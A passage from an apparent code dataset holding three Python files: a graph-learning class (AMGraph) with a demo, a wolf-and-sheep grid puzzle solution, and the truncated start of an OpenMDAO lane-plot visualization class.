graph: optional AMGraph or Dict that will be copied\n :param directional: Boolean flag indicating if edges are directional\n :param uid_copy: Boolean flag indicating if uid of supplied graph should be copied\n :param normalised: Boolean flag indicating edges of graph are normalised\n \"\"\"\n\n # the edges keyed by EdgeKey\n #\n self.edges: dict = {}\n\n # the nodes keyed by NodeKey\n #\n self.nodes: dict = {}\n\n self.directional = directional\n self.normalised = normalised\n\n # dict of NodeKeys with attributes that are graphs\n #\n self.embedded_graphs = {}\n\n self.edgeTypes = set()\n\n self.uid = None\n\n if graph is not None:\n if isinstance(graph, AMGraph):\n self.edges = deepcopy(graph.edges)\n self.nodes = deepcopy(graph.nodes)\n self.embedded_graphs = deepcopy(graph.embedded_graphs)\n self.normalised = graph.normalised\n self.directional = graph.directional\n self.edgeTypes = deepcopy(graph.edgeTypes)\n if uid_copy:\n self.uid = graph.uid\n\n elif isinstance(graph, dict):\n self.edges = deepcopy(graph['edges'])\n self.nodes = deepcopy(graph['nodes'])\n self.directional = graph['directional']\n self.embedded_graphs = deepcopy(graph['embedded_graphs'])\n self.normalised = graph['normalised']\n self.edgeTypes = deepcopy(graph['edgeTypes'])\n\n if uid_copy:\n self.uid = graph['uid']\n\n # reconstruct any embedded graphs\n #\n for node_key in self.embedded_graphs:\n for attr in self.embedded_graphs[node_key]:\n self.nodes[node_key][attr] = AMGraph(graph=self.nodes[node_key][attr])\n\n # set the uid if provided\n #\n if uid is not None:\n self.uid = uid\n\n # else if graph has not been provided to copy or copy_uid is not required\n #\n if self.uid is None:\n\n # if the class next_uid is None then start from 1\n #\n with AMGraph._uid_lock:\n\n # set to 1 if never been set before\n #\n if AMGraph._next_uid is None:\n AMGraph._next_uid = 1\n\n # create standard uid\n #\n self.uid = f'_graph_{AMGraph._next_uid}'\n\n # increment for next graphs\n #\n AMGraph._next_uid += 1\n\n def to_dict(self, denormaliser=None) -> dict:\n \"\"\"\n represents graphs as a dictionary\n :return: dictionary with keys: edges, nodes, uid, directional\n \"\"\"\n graph_dict = {'nodes': deepcopy(self.nodes),\n 'edges': deepcopy(self.edges),\n 'edgeTypes': deepcopy(self.edgeTypes),\n 'directional': self.directional,\n 'normalised': self.normalised,\n 'uid': self.uid,\n 'embedded_graphs': deepcopy(self.embedded_graphs),\n 'amgraph': True}\n\n for node_key in self.embedded_graphs:\n for attr in self.embedded_graphs[node_key]:\n if denormaliser is not None:\n graph_dict['nodes'][node_key][attr] = denormaliser.denormalise(graph=graph_dict['nodes'][node_key][attr]).to_dict(denormaliser=denormaliser)\n graph_dict['normalised'] = False\n else:\n graph_dict['nodes'][node_key][attr] = graph_dict['nodes'][node_key][attr].to_dict()\n\n return graph_dict\n\n def set_node(self,\n node: Union[NodeKey, NodeId],\n timestamp: Optional[float] = None,\n **node_attributes) -> NodeKey:\n\n if isinstance(node, tuple):\n node_key = get_node_key(node_id=node)\n node_id = node\n else:\n node_key = node\n node_id = get_node_id(node_key=node)\n\n if timestamp is None:\n ts = time.time()\n else:\n ts = timestamp\n\n if node_key not in self.nodes:\n self.nodes[node_key] = {'_type': node_id[0],\n '_uid': node_id[1],\n '_created': ts,\n '_updated': None,\n '_edges': set(),\n '_community': None,\n '_changed': False}\n\n else:\n self.nodes[node_key]['_updated'] = ts\n self.nodes[node_key]['_changed'] = True\n\n if len(node_attributes) > 0:\n 
self.nodes[node_key].update(**node_attributes)\n\n        # keep track of any attributes that are embedded graphs\n        #\n        for attr in node_attributes:\n            if isinstance(node_attributes[attr], AMGraph):\n                if node_key not in self.embedded_graphs:\n                    self.embedded_graphs[node_key] = {attr}\n                else:\n                    self.embedded_graphs[node_key].add(attr)\n\n        return node_key\n\n    def set_edge(self,\n                 triple: Union[TripleKey, TripleId],\n                 source_attr: Optional[dict] = None,\n                 target_attr: Optional[dict] = None,\n                 prob: float = 1.0,\n                 numeric: Optional[float] = None,\n                 audit: bool = False,\n                 timestamp: Optional[float] = None,\n                 **edge_attributes\n                 ):\n\n        if timestamp is None:\n            ts = time.time()\n        else:\n            ts = timestamp\n\n        if isinstance(triple, tuple):\n            triple_id = triple\n            triple_key = get_triple_key(triple_id=triple, directional=self.directional)\n        else:\n            triple_id = get_triple_id(triple_key=triple)\n            triple_key = triple\n\n        # keep track of edge types\n        #\n        self.edgeTypes.add(triple_id[1][0])\n\n        # add nodes if necessary\n        #\n        if source_attr is not None:\n            source_key = self.set_node(node=triple_id[0], timestamp=ts, **source_attr)\n        else:\n            source_key = self.set_node(node=triple_id[0], timestamp=ts)\n\n        if target_attr is not None:\n            target_key = self.set_node(node=triple_id[2], timestamp=ts, **target_attr)\n        else:\n            target_key = self.set_node(node=triple_id[2], timestamp=ts)\n\n        if audit and triple_key in self.edges:\n\n            # construct an expired triple_id\n            #\n            expired_triple_id = (triple_id[0], (triple_id[1][0], triple_id[1][1], ts), triple_id[2])\n            expired_edge_key = get_triple_key(triple_id=expired_triple_id, directional=self.directional)\n\n            # copy over attributes\n            #\n            self.edges[expired_edge_key] = deepcopy(self.edges[triple_key])\n\n            # update the attributes\n            #\n            self.edges[expired_edge_key]['_changed'] = True\n            self.edges[expired_edge_key]['_updated'] = ts\n            self.edges[expired_edge_key]['_expired'] = ts\n            add_new_edge = True\n\n        elif triple_key in self.edges:\n\n            add_new_edge = False\n\n            # update the attributes\n            #\n            self.edges[triple_key]['_updated'] = ts\n            self.edges[triple_key]['_changed'] = True\n            self.edges[triple_key]['_prob'] = prob\n\n            if numeric is not None:\n                self.edges[triple_key]['_numeric'] = numeric\n\n            if len(edge_attributes) > 0:\n                self.edges[triple_key].update(**edge_attributes)  # was .updated(), which is not a dict method\n        else:\n            add_new_edge = True\n\n        # add new edge if required\n        #\n        if add_new_edge:\n            self.edges[triple_key] = {'_type': triple_id[1][0],\n                                      '_uid': triple_id[1][1],\n                                      '_source': source_key,\n                                      '_target': target_key,\n                                      '_prob': prob,\n                                      '_numeric': numeric,\n                                      '_created': ts,\n                                      '_updated': None,\n                                      '_expired': None,\n                                      '_changed': False}\n\n            if len(edge_attributes) > 0:\n                self.edges[triple_key].update(**edge_attributes)\n\n        # add edge to nodes\n        #\n        self.nodes[source_key]['_edges'].add(triple_key)\n        if not self.directional:\n            self.nodes[target_key]['_edges'].add(triple_key)\n\n        return triple_key\n\n    def remove_edge(self,\n                    triple: Union[TripleKey, TripleId],\n                    audit: bool = False):\n\n        if isinstance(triple, tuple):\n            triple_id = triple\n            triple_key = get_triple_key(triple_id=triple, directional=self.directional)\n        else:\n            triple_id = get_triple_id(triple_key=triple)\n            triple_key = triple\n\n        if triple_key in self.edges:\n\n            if audit:\n                ts = time.time()\n\n                # construct an expired triple_id\n                #\n                expired_triple_id = (triple_id[0], (triple_id[1][0], triple_id[1][1], ts), triple_id[2])\n                expired_edge_key = get_triple_key(triple_id=expired_triple_id, directional=self.directional)\n\n                self.edges[expired_edge_key] = 
deepcopy(self.edges[triple_key])\n self.edges[expired_edge_key]['_changed'] = True\n self.edges[expired_edge_key]['_updated'] = ts\n self.edges[expired_edge_key]['_expired'] = ts\n\n # remove edge from nodes\n #\n self.nodes[self.edges[triple_key]['_source']]['_edges'].discard(triple_key)\n if not self.directional:\n self.nodes[self.edges[triple_key]['_target']]['_edges'].discard(triple_key)\n \n # delete the edge\n #\n del self.edges[triple_key]\n\n # delete edgeType entry if all edges have been removed\n #\n if not audit and sum([1 for t_key in self.edges if self.edges[t_key]['_type'] == triple_id[1][0]]) == 0:\n self.edgeTypes.discard(triple_id[1][0])\n\n def remove_node(self, node: Union[NodeKey, NodeId]):\n\n if isinstance(node, tuple):\n node_key = get_node_key(node_id=node)\n else:\n node_key = node\n\n if node_key in self.nodes:\n\n # first delete any edges node has\n #\n triple_keys = list(self.nodes[node_key]['_edges'])\n for triple_key in triple_keys:\n self.remove_edge(triple=triple_key, audit=False)\n\n del self.nodes[node_key]\n\n if node_key in self.embedded_graphs:\n del self.embedded_graphs[node_key]\n\n def compare_graph(self, graph_to_compare=None, compare_edge_types: Optional[Set[EdgeType]] = None) -> Tuple[float, Por]:\n\n distance: float = 0.0\n numeric_dist: float\n prob_dist: float\n\n por: Por = {}\n\n # if graph_to_compare is None then set to an empty graph\n #\n if graph_to_compare is None:\n graph_to_compare = AMGraph()\n\n if compare_edge_types is not None:\n\n # get the edges to compare - ie the edge type is in compare_edge_types and edge is not expired\n #\n triples_to_compare = ({triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_type'] in compare_edge_types and self.edges[triple_key]['_expired'] is None} |\n {triple_key\n for triple_key in graph_to_compare.edges\n if graph_to_compare.edges[triple_key]['_type'] in compare_edge_types and graph_to_compare.edges[triple_key]['_expired'] is None})\n else:\n triples_to_compare = ({triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_expired'] is None} |\n {triple_key\n for triple_key in graph_to_compare.edges\n if graph_to_compare.edges[triple_key]['_expired'] is None})\n\n for triple_key in triples_to_compare:\n\n # default numeric_dist in case edge numeric is None\n #\n numeric_dist = 0.0\n\n # if edge in both graphs\n #\n if triple_key in self.edges and triple_key in graph_to_compare.edges:\n prob_dist = abs(self.edges[triple_key]['_prob'] - graph_to_compare.edges[triple_key]['_prob'])\n\n if self.edges[triple_key]['_numeric'] is not None and graph_to_compare.edges[triple_key]['_numeric'] is not None:\n numeric_dist = abs(self.edges[triple_key]['_numeric'] - graph_to_compare.edges[triple_key]['_numeric'])\n\n # if edge only in this graph\n #\n elif triple_key in self.edges:\n prob_dist = self.edges[triple_key]['_prob']\n\n if self.edges[triple_key]['_numeric'] is not None:\n numeric_dist = self.edges[triple_key]['_numeric']\n\n # if edge only in graph_to_compare\n #\n else:\n prob_dist = graph_to_compare.edges[triple_key]['_prob']\n\n if graph_to_compare.edges[triple_key]['_numeric'] is not None:\n numeric_dist = graph_to_compare.edges[triple_key]['_numeric']\n\n por[triple_key] = {'prob': prob_dist, 'numeric': numeric_dist}\n\n distance += pow(prob_dist, 2)\n\n distance += pow(numeric_dist, 2)\n\n distance = sqrt(distance)\n\n return distance, por\n\n def learn_graph(self, graph_to_learn=None, learn_rate: float = 1.0, learn_edge_types: Optional[Set[EdgeType]] = None, 
prune_threshold: float = 0.1, audit: bool = False):\n\n        # if graph_to_learn is None then set to an empty graph\n        #\n        if graph_to_learn is None:\n            graph_to_learn = AMGraph()\n\n        if learn_edge_types is not None:\n\n            # get the edges to compare - ie the edge type is in compare_edge_types and edge is not expired\n            #\n            exist_triples_to_learn = {triple_key\n                                      for triple_key in self.edges\n                                      if self.edges[triple_key]['_type'] in learn_edge_types and self.edges[triple_key]['_expired'] is None}\n            triples_to_learn = (exist_triples_to_learn |\n                                {triple_key\n                                 for triple_key in graph_to_learn.edges\n                                 if graph_to_learn.edges[triple_key]['_type'] in learn_edge_types and graph_to_learn.edges[triple_key]['_expired'] is None})\n        else:\n            exist_triples_to_learn = {triple_key\n                                      for triple_key in self.edges\n                                      if self.edges[triple_key]['_expired'] is None}\n            triples_to_learn = (exist_triples_to_learn |\n                                {triple_key\n                                 for triple_key in graph_to_learn.edges\n                                 if graph_to_learn.edges[triple_key]['_expired'] is None})\n\n        # if no existing edges to learn then override learn rate to maximum (1.0)\n        #\n        if len(exist_triples_to_learn) == 0:  # was len(triples_to_learn), which made the override unreachable\n            learn_rate = 1.0\n\n        if audit:\n            ts = time.time()\n        else:\n            ts = None\n\n        triples_to_prune = set()\n\n        for triple_key in triples_to_learn:\n\n            # if edge in both graphs\n            #\n            if triple_key in self.edges and triple_key in graph_to_learn.edges:\n\n                prob = self.edges[triple_key]['_prob'] + ((graph_to_learn.edges[triple_key]['_prob'] - self.edges[triple_key]['_prob']) * learn_rate)\n\n                numeric = None\n\n                if prob > prune_threshold:\n\n                    if self.edges[triple_key]['_numeric'] is not None and graph_to_learn.edges[triple_key]['_numeric'] is not None:\n                        numeric = self.edges[triple_key]['_numeric'] + ((graph_to_learn.edges[triple_key]['_numeric'] - self.edges[triple_key]['_numeric']) * learn_rate)\n\n                    self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n                else:\n                    triples_to_prune.add(triple_key)\n\n            # if edge only in this graph\n            #\n            elif triple_key in self.edges:\n\n                prob = self.edges[triple_key]['_prob'] + ((0.0 - self.edges[triple_key]['_prob']) * learn_rate)\n\n                numeric = None\n\n                if prob > prune_threshold:\n\n                    if self.edges[triple_key]['_numeric'] is not None:\n                        numeric = self.edges[triple_key]['_numeric'] + ((0.0 - self.edges[triple_key]['_numeric']) * learn_rate)\n\n                    self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n                else:\n                    triples_to_prune.add(triple_key)\n\n            # if edge only in graph_to_learn\n            #\n            else:\n                prob = (graph_to_learn.edges[triple_key]['_prob']) * learn_rate\n\n                numeric = None\n\n                if prob > prune_threshold:\n\n                    if graph_to_learn.edges[triple_key]['_numeric'] is not None:\n                        numeric = graph_to_learn.edges[triple_key]['_numeric'] * learn_rate\n\n                    self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n        # now copy over triples not learnt and not expired\n        #\n        if learn_edge_types is not None:\n            triples_to_copy = {triple_key\n                               for triple_key in graph_to_learn.edges\n                               if graph_to_learn.edges[triple_key]['_type'] not in learn_edge_types and graph_to_learn.edges[triple_key]['_expired'] is None}\n\n            for triple_key in triples_to_copy:\n\n                prob = graph_to_learn.edges[triple_key]['_prob'] * learn_rate\n\n                if graph_to_learn.edges[triple_key]['_numeric'] is not None:\n                    numeric = graph_to_learn.edges[triple_key]['_numeric'] * learn_rate\n                else:\n                    numeric = None\n\n                self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n        # now prune triples\n        #\n        for 
triple_key in triples_to_prune:\n self.remove_edge(triple=triple_key, audit=audit)\n\n def learn_edge(self, triple: Union[TripleKey, TripleId], learn_rate, numeric: Optional[float] = None, prune_threshold: float = 0.0, audit: bool = False) -> TripleKey:\n\n if isinstance(triple, tuple):\n triple_id = triple\n triple_key = get_triple_key(triple_id=triple, directional=self.directional)\n else:\n triple_id = get_triple_id(triple_key=triple)\n triple_key = triple\n\n source_key = get_node_key(node_id=triple_id[0])\n if source_key not in self.nodes:\n self.set_edge(triple=triple, prob=1.0, numeric=numeric, audit=audit)\n else:\n triples_to_process = {existing_triple_key\n for existing_triple_key in self.nodes[source_key]['_edges']\n if self.edges[existing_triple_key]['_type'] == triple_id[1][0] and self.edges[existing_triple_key]['_expired'] is None}\n\n triples_to_process.add(triple_key)\n triples_to_prune = set()\n\n for triple_key_to_process in triples_to_process:\n if triple_key_to_process != triple_key:\n\n # weaken the probability of this edge and reduce numeric closer to 0.0\n #\n existing_prob = self.edges[triple_key_to_process]['_prob'] + ((0.0 - self.edges[triple_key_to_process]['_prob']) * learn_rate)\n\n if existing_prob > prune_threshold:\n if self.edges[triple_key_to_process]['_numeric'] is not None:\n existing_numeric = self.edges[triple_key_to_process]['_numeric'] + ((0.0 - self.edges[triple_key_to_process]['_numeric']) * learn_rate)\n else:\n existing_numeric = None\n\n self.set_edge(triple=triple_key_to_process, prob=existing_prob, numeric=existing_numeric, audit=audit)\n\n else:\n triples_to_prune.add(triple_key_to_process)\n\n else:\n if triple_key_to_process in self.edges:\n new_prob = self.edges[triple_key_to_process]['_prob'] + ((1.0 - self.edges[triple_key_to_process]['_prob']) * learn_rate)\n if numeric is not None and self.edges[triple_key_to_process]['_numeric'] is not None:\n new_numeric = self.edges[triple_key_to_process]['_numeric'] + ((numeric - self.edges[triple_key_to_process]['_numeric']) * learn_rate)\n else:\n new_numeric = numeric\n else:\n\n # if there is more than one triple in triples_to_process, edges of this type already exist, so prob starts at learn_rate\n #\n if len(triples_to_process) > 1:\n new_prob = learn_rate\n if numeric is not None:\n new_numeric = numeric * learn_rate\n else:\n new_numeric = None\n\n # else probability needs to start from 1.0\n #\n else:\n new_prob = 1.0\n new_numeric = numeric\n\n self.set_edge(triple=triple_key_to_process, prob=new_prob, numeric=new_numeric, audit=audit)\n # now prune triples (loop variable renamed so the triple_key returned below is not clobbered)\n #\n for triple_key_to_prune in triples_to_prune:\n self.remove_edge(triple=triple_key_to_prune, audit=audit)\n\n return triple_key\n\n def merge_graph(self, graph_to_merge, weight: float = 1.0, audit: bool = False):\n\n triples_to_merge = {triple_key\n for triple_key in graph_to_merge.edges\n if graph_to_merge.edges[triple_key]['_expired'] is None}\n\n if audit:\n ts = time.time()\n else:\n ts = None\n\n for triple_key in triples_to_merge:\n\n # if edge in both graphs\n #\n if triple_key in self.edges and triple_key in graph_to_merge.edges:\n\n prob = self.edges[triple_key]['_prob'] + (graph_to_merge.edges[triple_key]['_prob'] * weight)\n\n numeric = None\n\n if self.edges[triple_key]['_numeric'] is not None and graph_to_merge.edges[triple_key]['_numeric'] is not None:\n numeric = self.edges[triple_key]['_numeric'] + (graph_to_merge.edges[triple_key]['_numeric'] * weight)\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, 
prob=prob)\n\n # if edge only in graph_to_merge\n #\n elif triple_key in graph_to_merge.edges:\n\n prob = (graph_to_merge.edges[triple_key]['_prob']) * weight\n\n numeric = None\n\n if graph_to_merge.edges[triple_key]['_numeric'] is not None:\n numeric = graph_to_merge.edges[triple_key]['_numeric'] * weight\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n def diff_graph(self, graph_to_diff):\n\n for triple_key in graph_to_diff.edges:\n if triple_key in self.edges:\n if graph_to_diff.edges[triple_key]['_numeric'] is not None:\n if self.edges[triple_key]['_numeric'] is not None:\n self.edges[triple_key]['_numeric'] = self.edges[triple_key]['_numeric'] - graph_to_diff.edges[triple_key]['_numeric']\n else:\n self.edges[triple_key]['_numeric'] = -graph_to_diff.edges[triple_key]['_numeric']\n elif graph_to_diff.edges[triple_key]['_numeric'] is not None:\n self.set_edge(triple=triple_key, numeric=-graph_to_diff.edges[triple_key]['_numeric'])\n\n def rename_triples(self, postfix_edge_uid=None):\n\n for exist_triple_key in list(self.edges):\n\n exist_triple_id = get_triple_id(triple_key=exist_triple_key)\n new_triple = deepcopy(self.edges[exist_triple_key])\n\n new_triple['_uid'] = f'{new_triple[\"_uid\"]}_{postfix_edge_uid}'\n new_triple_id = (exist_triple_id[0], (new_triple['_type'], new_triple['_uid'], new_triple['_expired']), exist_triple_id[2])\n new_triple_key = get_triple_key(triple_id=new_triple_id, directional=self.directional)\n\n del self.edges[exist_triple_key]\n self.edges[new_triple_key] = new_triple\n\n self.nodes[new_triple['_source']]['_edges'].discard(exist_triple_key)\n self.nodes[new_triple['_source']]['_edges'].add(new_triple_key)\n if not self.directional:\n self.nodes[new_triple['_target']]['_edges'].discard(exist_triple_key)\n self.nodes[new_triple['_target']]['_edges'].add(new_triple_key)\n\n def get_sub_graphs(self, generalise: bool = False):\n sub_graphs = []\n if self.directional:\n for node_key in self.nodes:\n if len(self.nodes[node_key]['_edges']) > 0:\n graph = AMGraph(directional=True)\n\n if generalise:\n source_id = (self.nodes[node_key]['_type'], '*')\n else:\n source_id = (self.nodes[node_key]['_type'], self.nodes[node_key]['_uid'])\n\n for edge_key in self.nodes[node_key]['_edges']:\n edge_id = (self.edges[edge_key]['_type'], self.edges[edge_key]['_uid'], self.edges[edge_key]['_expired'])\n target_id = (self.nodes[self.edges[edge_key]['_target']]['_type'], self.nodes[self.edges[edge_key]['_target']]['_uid'])\n graph.set_edge(triple=(source_id, edge_id, target_id),\n prob=self.edges[edge_key]['_prob'],\n numeric=self.edges[edge_key]['_numeric'])\n sub_graphs.append((self.nodes[node_key]['_type'], graph))\n\n return sub_graphs\n\n def calc_communities(self, community_edge_type: EdgeType, weight_field='_numeric', inverse=False):\n if len(self.edges) > 1:\n nx_graph = nx.MultiGraph()\n distances = [self.edges[triple_key][weight_field] for triple_key in self.edges if self.edges[triple_key]['_type'] == community_edge_type]\n min_distance = min(distances)\n max_distance = max(distances)\n for triple_key in self.edges:\n if self.edges[triple_key]['_type'] == community_edge_type and self.edges[triple_key]['_expired'] is None:\n weight = (self.edges[triple_key][weight_field] - min_distance) / (max_distance - min_distance)\n if inverse:\n weight = 1 - weight\n nx_graph.add_edge(self.edges[triple_key]['_source'], self.edges[triple_key]['_target'], weight=weight)\n\n communities = 
list(nx.algorithms.community.greedy_modularity_communities(nx_graph, weight='weight'))\n for c_idx in range(len(communities)):\n for node_key in communities[c_idx]:\n self.nodes[node_key]['_community'] = c_idx\n\n\nif __name__ == '__main__':\n\n from src.normalise_amgraph import NormaliseAMGraph\n\n g1 = AMGraph(directional=True)\n g1.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200)\n\n g1.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=False)\n\n g1.remove_node(node=('A', '1'))\n\n g1.remove_node(node=('B', '2'))\n\n g1.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200, audit=True)\n\n g1.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=400, audit=True)\n\n g1.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=True)\n\n g2 = AMGraph(directional=False)\n\n g2.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200)\n\n g2.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=False)\n\n g2.remove_node(node=('A', '1'))\n\n g2.remove_node(node=('B', '2'))\n\n g2.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200, audit=True)\n\n g2.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=400, audit=True)\n\n g2.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=True)\n\n g3 = AMGraph(directional=True)\n\n g3.set_edge(triple=(('TRADE', '*'), ('HAS_PLATFORM', None, None), ('PLATFORM', 'A')))\n g3.set_edge(triple=(('TRADE', '*'), ('HAS_DATE', None, None), ('DATE', '22-11-66')))\n g3.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=100)\n\n g4 = AMGraph(directional=True)\n\n g4.set_edge(triple=(('TRADE', '*'), ('HAS_PLATFORM', None, None), ('PLATFORM', 'A')))\n g4.set_edge(triple=(('TRADE', '*'), ('HAS_DATE', None, None), ('DATE', '22-11-66')))\n g4.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=200)\n\n normaliser = NormaliseAMGraph()\n g3n, new_min_max = normaliser.normalise(graph=g3)\n g4n, new_min_max = normaliser.normalise(graph=g4)\n\n distance, por = g3n.compare_graph(graph_to_compare=g4n)\n\n g3n1 = AMGraph(graph=g3n)\n\n g3n1.learn_graph(graph_to_learn=g4n, learn_rate=0.7)\n g3n1d = normaliser.denormalise(graph=g3n1)\n\n g3n1.learn_graph(graph_to_learn=g4n, learn_rate=0.7)\n g3n1d = normaliser.denormalise(graph=g3n1)\n\n g5 = AMGraph()\n g5.merge_graph(graph_to_merge=g3n, weight=0.5)\n g5d = normaliser.denormalise(graph=g5)\n\n g5.merge_graph(graph_to_merge=g4n, weight=0.5)\n g5d = normaliser.denormalise(graph=g5)\n\n g6 = AMGraph()\n g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '2')), learn_rate=0.7)\n g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '2')), learn_rate=0.7)\n g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '3')), learn_rate=0.7)\n g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '3')), learn_rate=0.7)\n\n g7 = AMGraph(directional=True)\n g7.set_edge(triple=(('TRADE', '1'), ('HAS_PLATFORM', None, None), ('PLATFORM', 'A')))\n g7.set_edge(triple=(('TRADE', '1'), ('HAS_DATE', None, None), ('DATE', '22-11-66')))\n g7.set_edge(triple=(('PLATFORM', 'A'), ('HAS_CHANNEL', None, None), ('CHANNEL', 'Electronic')))\n\n sub_graphs = g7.get_sub_graphs()\n\n sub_graphs_g = g7.get_sub_graphs(generalise=True)\n\n g8 = AMGraph()\n g8.set_node(node=('NEURON', '1'), a_graph=g3n1)\n\n jg8n = 
g8.to_dict()\n jg8dn = g8.to_dict(denormaliser=normaliser)\n\n g9 = AMGraph()\n g9.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=200)\n\n stm = AMGraph(graph=g9)\n ltm = AMGraph(graph=g9)\n\n g10 = AMGraph()\n g10.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=100)\n\n stm.learn_graph(graph_to_learn=g10, learn_rate=0.7)\n ltm.learn_graph(graph_to_learn=g10, learn_rate=0.4)\n\n dg = AMGraph(graph=stm)\n dg.diff_graph(graph_to_diff=ltm)\n dg.rename_triples(postfix_edge_uid='lstm')\n\n dg.merge_graph(graph_to_merge=g10, weight=1.0)\n\n\n print('finished')\n","sub_path":"src/am_graph.py","file_name":"am_graph.py","file_ext":"py","file_size_in_byte":35777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
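The learn_graph and learn_edge updates in am_graph.py above are all instances of the same exponential-moving-average rule, new = old + (target - old) * learn_rate. A minimal standalone sketch (the names here are illustrative, not part of AMGraph) showing why repeated updates converge on the target:

def ema_update(old: float, target: float, learn_rate: float) -> float:
    # the same update the graph applies to '_prob' and '_numeric'
    return old + (target - old) * learn_rate

prob = 0.0
for step in range(5):
    prob = ema_update(prob, 1.0, 0.7)
    print(step, round(prob, 4))
# prints: 0 0.7, 1 0.91, 2 0.973, 3 0.9919, 4 0.9976

With learn_rate=1.0 the old value is discarded entirely, which is why learn_graph forces learn_rate to 1.0 when there are no existing edges to learn from.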
+{"seq_id":"97447355","text":"import sys\n\nM, N = map(int, sys.stdin.readline().strip().split())\n\nmaps = []\nfor _ in range(M):\n maps.append(list(sys.stdin.readline().strip()))\n\ndx = [0, 0, 1, -1]\ndy = [1, -1, 0, 0]\n\n\ndef find(i, j):\n for k in range(4):\n if i + dx[k] < 0 or i + dx[k] >= M:\n continue\n if j + dy[k] < 0 or j + dy[k] >= N:\n continue\n\n cur = maps[i + dx[k]][j + dy[k]]\n if cur == 'S':\n print(0)\n exit()\n elif cur in ['W', 'D']:\n continue\n else:\n maps[i + dx[k]][j + dy[k]] = 'D'\n\n\nfor i in range(M):\n for j in range(N):\n if maps[i][j] == 'W':\n find(i, j)\n\nprint(1)\nfor m in maps:\n print(''.join(m))\n","sub_path":"backjoon/Graph/16956_늑대와_양.py","file_name":"16956_늑대와_양.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"394230226","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCopyright 2017 D. de Vries\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nThis file contains the definition of the `BaseLanePlotter` class.\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nimport abc\nfrom abc import abstractmethod\n\nimport matplotlib.colors as colors\nimport numpy as np\nfrom matplotlib import ticker as ticker\nfrom matplotlib.figure import Figure\nfrom openmdao.core.driver import Driver\nfrom typing import Optional\n\nfrom .base_iteration_plotter import BaseIterationPlotter\n\n\nclass BaseLanePlotter(BaseIterationPlotter):\n \"\"\"Specialized `BaseIterationPlotter` wrapping a ``lane plot`` style visualization of variables.\n\n Abstract base class enabling OpenMDAO data to be visualized using colored, horizontal lanes. Each variable to be\n visualized this way has its own lane. The x-axis corresponds to the number of iterations/function evaluations. A\n colorbar is used to indicate the value of a design variable.\n\n Attributes\n ----------\n n_vars : int\n The number variables.\n\n var_names : :obj:`list` of :obj:`str`\n List of all variable names.\n\n xs, ys, cs: :obj:`np.ndarray`\n Arrays containing the x-, y-, and color data of the figure.\n\n iter : int\n Number of the last iteration.\n\n ax : :obj:`Axes`\n Matplotlib `Axes` of the plot.\n\n max_iter : int\n Maximum number of iterations.\n\n quad : :obj:`matplotlib.collections.QuadMesh`\n Instance of `QuadMesh` that represents the actual plot.\n\n vmin, vmax : float\n Lower and upper cutoff for values along the colorbar.\n\n cmap : str\n Name of the colormap to use.\n\n norm : :obj:`colors.Normalize`, optional\n Which normalization scheme to use for the colorbar.\n \"\"\"\n __metaclass__ = abc.ABCMeta\n\n def __init__(self, vmin=0., vmax=1., cmap='viridis', norm=None):\n # type: (float, float, str, Optional[colors.Normalize]) -> None\n \"\"\"Initialize a new `BaseLanePlotter` instance.\n\n Parameters\n ----------\n vmin, vmax : float\n Lower and upper cutoff for the values along the colorbar.\n\n cmap : str('viridis')\n Name of the colormap to use for the plot.\n\n norm : :obj:`colors.Normalize`, optional\n Instance of `colors.Normalize` can be supplied to use a normalization scheme for the colorbar.\n \"\"\"\n super(BaseLanePlotter, self).__init__()\n\n self.n_vars = None\n self.var_names = None\n\n self.xs = None\n self.ys = None\n self.cs = None\n\n self.iter = 0\n self.ax = None\n self.max_iter = 1000\n\n self.quad = None\n\n self.vmin = vmin\n self.vmax = vmax\n self.cmap = cmap\n self.norm = norm\n\n def startup(self, object_requesting_recording):\n # type: (Driver) 